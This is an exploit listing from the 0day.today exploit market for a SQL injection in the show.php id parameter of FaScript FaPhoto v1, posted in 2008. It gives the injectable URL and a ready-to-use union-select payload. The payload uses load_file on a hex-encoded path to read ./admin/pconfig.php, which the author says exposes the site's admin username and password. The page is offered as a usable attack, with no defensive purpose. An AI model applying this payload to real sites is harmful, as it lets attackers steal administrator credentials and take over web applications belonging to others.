[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FaScript FaPhoto v1 (show.php id) SQL Injection Vulnerability

Author
IRCRASH
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2794
Category
web applications
Date add
31-03-2008
Platform
unsorted
=============================================================
FaScript FaPhoto v1 (show.php id) SQL Injection Vulnerability
=============================================================



#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://en.fascript.com/en.faphoto.zip                            #
#                                                                                   #
#Injection Adress :  http://Sitename/faname/show.php?id=<SqL Code>                  #
#                                                                                   #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php      #
#       You can open this file with load_file Function in mysql and see admin       #
#       Username and password in Page Source                                        #
#                                                                                   #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870            #
#                                                                                   #
#SQL Code for Read pconfig.php : 999999%27union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3,4,5,6/*
#                                                                                   #
#####################################################################################




#  0day.today [2024-12-25]  #